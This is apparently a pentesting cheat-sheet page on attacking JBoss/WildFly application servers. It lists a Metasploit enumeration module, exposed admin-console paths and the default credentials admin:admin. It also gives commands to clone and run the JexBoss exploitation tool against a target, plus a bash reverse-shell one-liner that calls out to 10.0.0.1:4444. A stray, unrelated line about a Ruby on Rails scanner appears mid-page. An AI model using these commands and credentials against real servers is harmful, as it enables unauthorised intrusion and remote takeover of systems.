JBOSS Pentesting

JBOSS AS (Application Server), also known as WildFly, is an application server which is written in Java.

Enumeration

msfconsole
msf > use auxiliary/scanner/http/jboss_vulnscan

Common Directories

/admin-console/
/invoker/JMXInvokerServlet
/jbossws/
/jmx-console/
/jmx-console/HtmlAdaptor
/management
/manager
/status?full=true
/web-console/
/web-console/Invoker
/web-console/ServerInfo.jsp

Default Credentials

admin:admin

Exploitation

JexBoss is available as an exploitation CLI tool.

git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip3 install -r requirements.txt
python3 jexboss.py -host https://example.com:8080

# Reverse Shell
Shell> /bin/bash -i > /dev/tcp/10.0.0.1/4444 0>&1 2>&1

GitHub - presidentbeef/brakeman: A static analysis security vulnerability scanner for Ruby on Rails applicationsGitHub

# JexBoss
# https://github.com/joaomatosf/jexboss
python jexboss.py -host http://target_host:8080

PreviousIcinga Web Pentesting NextJSON.NET Deserialization

Last updated 1 month ago

hashtagEnumeration

hashtagCommon Directories

hashtagDefault Credentials

hashtagExploitation

Enumeration

Common Directories

Default Credentials

Exploitation